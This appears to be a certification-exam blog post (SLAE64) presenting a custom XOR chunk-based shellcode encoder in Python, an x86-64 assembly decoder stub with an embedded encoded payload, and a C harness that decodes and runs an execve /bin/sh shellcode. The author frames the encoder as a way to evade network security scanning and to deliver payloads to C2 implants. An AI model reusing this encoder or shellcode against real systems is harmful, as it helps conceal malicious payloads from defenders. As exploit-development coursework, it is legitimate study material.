This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
https://www.pentesteracademy.com/course?id=7
Student ID: PA-30398
The source code for this assignment is stored at the following link: rbctee/SlaeExam.
Within the directory you can find the following files:
encoder.py
Writing an encoding scheme is pretty easy, you can simply apply the NOT operation on all the bytes and call it a day.
Although very basic, it's pretty good in terms of size: if you were to encode a 40 bytes long shellcode, the encoded version would probably be something like 55 bytes.
Nonetheless, there are a few drawbacks:
0xff
, after the NOT operation they will become 0x00
bytesFor this reason, while trying to come up with a new encoding scheme, I decided to focus on the two key points above i.e., managing NULL bytes and being strong enough from an evasion perspective.
The encoding scheme I came up with can be summarized in the following four steps:
Once the encoding scheme was completed on a theoretical level, I decided to implement it in the programming language I was most comfortable with: Python.
If these functions seem familiar to you, that may be due to the fact I'm reusing the script I've written for the fourth assignment of the SLAE32 exam.
I'm not going to comment all the script, instead I'll describe some of the choices behind the encoding function:
def encode_shellcode(shellcode: bytes) -> bytes:
global XOR_BYTE
encoded_shellcode = bytearray()
XOR_BYTE = random.choice(range(1, 256))
print(f"[+] Xoring bytes with the byte {hex(XOR_BYTE)}")
for b in shellcode:
encoded_shellcode.append(b ^ XOR_BYTE)
print(f"[+] Size of intermediate encoded shellcode is {len(encoded_shellcode)}")
if (len(encoded_shellcode) % 7) != 0:
print(f"[+] Adding padding to shellcode")
num_pad_bytes = 7 - (len(encoded_shellcode) % 7)
for x in range(num_pad_bytes):
encoded_shellcode.append(0)
else:
print(f"[+] No need to add padding to the shellcode")
print(f"[+] Slicing the shellcode into chunks of 7 bytes")
bytes_chunks = list(chunks(encoded_shellcode, 7))
encoded_shellcode = bytearray()
for c in bytes_chunks:
encoded_chunk = encode_chunk(c)
encoded_shellcode.extend(encoded_chunk)
print(f"[+] Finished encoding chunks")
return encoded_shellcode
First, it encodes each byte of the shellcode through the XOR operation. The XOR key in this case is a single byte chosen at random
.
Next, the function checks the length of the shellcode, adding NULL bytes at the end in case the length is not a multiple of 7, which is the size I chose for the chunks.
After that, the shellcode is divided into chunks, each of them XOR-encoded with a random byte which must not be already present in the chunk, in order to avoid NULL bytes in the final encoded shellcode.
This XOR byte is prepended to the chunk, thus obtaining a QWORD (8 bytes).
Initially, while I was pondering on the details of the encoding scheme, I chose 8 as the size of the chunks because I was thinking of loading chunks into registers.
Nonetheless, I decided against that idea since the decoder would have become more complex: to extract the prepended byte I would have to rotate the other bytes a few times.
To calculate the size of the encoded shellcode, you can use this formula:
def f(x):
return (x + (7 - (x % 7))) * (8/7)
Before continuing to the decoder, I think it's important to add a few notes regarding the features of the encoder.
The script uses a NASM template (by default loaded from the file decoder_template.txt
) in order to dynamically generate the final decoder program.
I chose this approach to avoid adding too many instructions to the decoder; initially the length of the decoder was around 100 bytes when it included the routine for retrieving the length of the encoded shellcode.
The value of the argument OUTPUT_DECODER
is the final decoder program you can then assemble to get the final shellcode.
As for the decoder, its length is a little bit more than 50 bytes; it's not good enough for exploits where size is a vital factor e.g., buffer overflows, or egghunters.
However, in my opinion it's good enough for bigger payloads; think of situations in which there are Network Security products scanning the network traffic.
This encoding scheme could be useful to Command & Control frameworks for sending second stages or shellcodes to their implants.
The decoder discussed in this paragraph was generated with a polymorphic stack-based execve shellcode I developed while taking the course.
Here's the full source code of the decoder program:
; Author: Robert C. Raducioiu
global _start
section .text
_start:
; clear RCX
xor ecx, ecx
jmp short CallShellcode
Shellcode:
; get the address of the encoded shellcode using
; the JMP-CALL-POP technique
pop rsi
; statically set the size of the shellcode
add cl, 80
; save the base address of the shellcode in RDX
push rsi
pop rdx
; push to the stack for later use
push rdx
; skip the next routine
jmp short LoopDecodeSkip
LoopDecode:
; increase registers to step to the next chunk
add rsi, 8
add rdx, 7
LoopDecodeSkip:
; clear RAX
xor eax, eax
; get the XOR byte of the chunk and XOR it
; with the XOR byte generated initially
mov bl, BYTE [rsi]
xor bl, 0xc
CopyDecodedByte:
; step to the next encoded byte
add al, 1
; decode the encoded byte
mov bh, BYTE [rsi + rax]
xor bh, bl
; replace the encoded byte with the decoded one
mov BYTE [rdx + rax], bh
; if RAX is 7 it means we decoded 7 bytes
; it's time to go to the next chunk
cmp al, 7
jz LoopDecode
; if RCX != 0 then go back to decoding
loop CopyDecodedByte
RunShellcode:
; skip the first byte (XOR byte)
pop rax
add al, 1
; run the decoded shellcode
call rax
CallShellcode:
call Shellcode
encoded: db 0x50,0x6d,0x95,0x14,0xab,0xbd,0x14,0xd5,0xd1,0x89,0xf9,0x25,0x95,0x5e,0x31,0xd5,0x27,0x7f,0x71,0x63,0x95,0x70,0x2a,0x20,0x14,0x4,0x43,0x54,0x9,0x2,0x50,0xa3,0x13,0x6b,0x7c,0x7d,0x6d,0x6b,0x7c,0x7d,0xe1,0x9f,0xa5,0xdc,0x33,0xbb,0xb9,0xb2,0x13,0x4e,0x57,0x96,0x63,0x3b,0xe7,0x57,0x1c,0x93,0xfc,0x18,0x58,0x9d,0x24,0x34,0x6b,0xe4,0xa7,0x5b,0x2f,0x98,0xaf,0x68,0x49,0x40,0x49,0x49,0x49,0x49,0x49,0x49
I won't describe each instruction, mostly because there's a comment for almost each one, but I'm going to list some key points:
JMP-CALL-POP
technique to retrieve the address of the encoded shellcode.CL
to determine the length of the shellcode. The value is statically set by the encoder; in case it's greater than 256, it uses the register CX
.LOOP
instruction to check if the counter register reached 0, hence determine if all the encoded bytes were decoded.As mentioned previously, I tested the program with a polymorphic version of the stack-based execve shellcode.
For the final Proof of Concept, I chose the simple version of the stack-based execve shellcode, which you can get here.
After that, I assembled the file decoder.nasm
using nasm
and retrieved the final shellcode using objcopy
. Follows the C program I've used to test the decoder shellcode:
#include <stdio.h>
#include <string.h>
// previously I've commited the error of initializing the buffer 'code' outside the main
// I said error because it would trigger a Segmentation Fault, due to the memory region
// not being executable.
// if you declare inside the main, it will be stored inside the .text section, which should be executable
void main(int argc, char* argv[])
{
unsigned char code[] = \
"\x31\xc9\xeb\x2d\x5e\x80\xc1\x28\x56\x5a\x52\xeb\x08\x48\x83\xc6\x08\x48\x83\xc2\x07\x31\xc0\x8a\x1e\x80\xf3\xd1\x04\x01\x8a\x3c\x06\x30\xdf\x88\x3c\x02\x3c\x07\x74\xe3\xe2\xf0\x58\x04\x01\xff\xd0\xe8\xce\xff\xff\xff\x4e\xae\x5f\xcf\xd7\x16\x7d\xd7\xcd\xa7\x33\x7e\x75\x72\x33\x33\x6d\xcf\xd4\xef\xf4\x35\x5b\xec\x14\x92\x8d\x4c\x23\x46\x05\xfe\x7d\xa3\xa9\x7d\x7d\x7d\x7d\x7d";
printf("[+] Shellcode length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Running the program above, I successfully managed to decode the encoded shellcode and execute the shell /bin/sh
.